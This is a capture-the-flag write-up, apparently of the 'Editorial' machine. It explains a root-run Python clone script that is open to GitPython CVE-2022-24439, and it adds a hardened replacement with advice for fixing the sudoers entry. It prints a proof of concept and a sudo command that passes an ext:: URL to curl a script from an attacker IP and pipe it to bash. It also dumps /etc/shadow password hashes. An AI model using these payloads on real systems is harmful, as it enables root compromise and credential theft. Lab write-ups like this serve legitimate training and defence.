prod@editorial:~$ cat /opt/internal_apps/clone_changes/clone_prod_change.py 
#!/usr/bin/python3

import os
import sys
from git import Repo

os.chdir('/opt/internal_apps/clone_changes')

url_to_clone = sys.argv[1]

r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])

This is a script written in Python using the GitPython library. A line-by-line explanation:
#!/usr/bin/python3 is a shebang (or hashbang) line; it tells the system which interpreter to use to execute the script. Here it specifies that the script is run by the Python 3 interpreter at /usr/bin/python3.
import os and import sys import the Python standard-library modules os and sys. The os module is used to interact with the operating system; the sys module handles aspects of the Python runtime environment, such as reading command-line arguments.
from git import Repo imports the Repo class from the GitPython library, which is used to operate on Git repositories.
os.chdir('/opt/internal_apps/clone_changes') uses the os module's chdir function to change the current working directory to /opt/internal_apps/clone_changes.
url_to_clone = sys.argv[1] takes the first command-line argument (Python indexes from 0; sys.argv[0] is the script name, so sys.argv[1] is the first argument) and stores it in url_to_clone.
r = Repo.init('', bare=True) creates a new Repo object (an object representing a Git repository) and initializes it in "bare" mode. In Git a "bare" repository has no working directory and contains only Git's internal data.
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"]) clones a Git repository from url_to_clone into a new directory named "new_changes". The multi_options argument passes the git configuration option protocol.ext.allow=always, which unconditionally enables git's ext:: transport; because url_to_clone comes straight from the command line without validation, the caller controls what that transport runs.

CVE-2022-24439

Reference:

Remote Code Execution (RCE) in gitpython | CVE-2022-24439 | Snyk

from git import Repo
r = Repo.init('', bare=True)
r.clone_from('ext::sh -c touch% /tmp/pwned', 'tmp', multi_options=["-c protocol.ext.allow=always"])

The same exploitation technique for this vulnerability appeared earlier in FormulaX from Season IV.

ext::sh -c curl% http://10.10.16.13/1.sh|bash >&2
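For the explanation of clone_prod_change.py and the CVE-2022-24439 section above, here is the shape a fixed script would take. It is an added example, not the script from the box or anything from GitPython's own documentation: the clone URL is validated before GitPython sees it, git's ext:: transport is left disabled instead of forced on with protocol.ext.allow=always, and the clone runs with a GIT_CONFIG_* environment override (supported by git 2.31 and later) that pins protocol.ext.allow=never. The allowed host list and the repository URLs are assumptions.

```python
# Added example: a hardened replacement for the clone step in
# clone_prod_change.py. Not the box's code. validate_clone_url() has no
# dependency on GitPython so the policy can be tested on its own.
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"https", "ssh"}


def validate_clone_url(url, allowed_hosts):
    """Return url if it is an https:// or ssh:// URL to an allow-listed host.

    Raises ValueError otherwise. Rejected shapes include git remote-helper
    syntax ("<helper>::<address>", which is how ext:: hands a command to a
    shell), local paths and file://, scp-style "user@host:path", strings that
    look like command-line options, and URLs carrying a password.
    """
    if not url:
        raise ValueError("empty URL")
    if url.startswith("-"):
        raise ValueError("URL must not look like a command-line option")
    # Remote-helper syntax puts "::" before any "://"; "ext::cmd" has no "://" at all.
    if "::" in url.split("://", 1)[0]:
        raise ValueError("remote-helper syntax (helper::address) is not allowed")
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parsed.scheme!r}")
    host = (parsed.hostname or "").lower()
    if host not in {h.lower() for h in allowed_hosts}:
        raise ValueError(f"host not allowed: {host!r}")
    if parsed.password:
        raise ValueError("password in URL is not allowed")
    return url


def safe_clone(url, dest, allowed_hosts):
    """Validate url, then clone it with GitPython into dest.

    No multi_options are passed. The environment overrides below tell git
    (2.31+) to treat protocol.ext.allow as "never" for this process and mark
    the run as non-interactive, so ext:: is refused even if a config file on
    the host tried to permit it for interactive use.
    """
    from git import Repo  # GitPython; imported here so validation runs without it

    validate_clone_url(url, allowed_hosts)
    env = {
        "GIT_PROTOCOL_FROM_USER": "0",
        "GIT_CONFIG_COUNT": "1",
        "GIT_CONFIG_KEY_0": "protocol.ext.allow",
        "GIT_CONFIG_VALUE_0": "never",
    }
    return Repo.clone_from(url, dest, env=env)


if __name__ == "__main__":
    import sys
    # Assumed allow-list; in the box the script accepted anything from argv.
    print(validate_clone_url(sys.argv[1], {"git.example.com"}))
```

Two other halves of the fix belong outside the script: upgrade GitPython to a release that refuses ext:: URLs by default, and tighten the sudoers entry, since the trailing `*` in `(root) /usr/bin/python3 ... clone_prod_change.py *` lets the prod user pass any argument to a root process; a fixed argument or a wrapper that reads the URL from a root-owned file removes the attacker-controlled input entirely.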


prod@editorial:~$ sudo -l 
[sudo] password for prod: 
Matching Defaults entries for prod on editorial:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User prod may run the following commands on editorial:
    (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *
prod@editorial:~$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c curl% http://10.10.16.4/1.sh|bash >&2'  

In Summary

user:

upload-conver (ssrf) → enum port 5000 → api → cred info

root:

git diff → cve-2022-24439 → root

Shadow

root@editorial:~# cat /etc/shadow |grep \$y
cat /etc/shadow |grep \$y
root:$y$j9T$PNijPFzQRd1/Yx6sr4HqS.$ITtQp.k4TN0RY1ADcvcSb.b9UcxD6Jx0MDNL3odgsV9:19878:0:99999:7:::
prod:$y$j9T$bQEMwg1M5mDlBp9UM9YAM0$y8V8Rl64myknJa31Tzt/x9hQpzavDce2vGK9K8y316.:19394:0:99999:7:::
dev:$y$j9T$KcdXrIRoJN69I1Ez4Zx1B/$Jc/EJctFUl4/PaL2RvwUWccq5zC4ep2KtIhMDtbTdn6:19390:0:99999:7:::
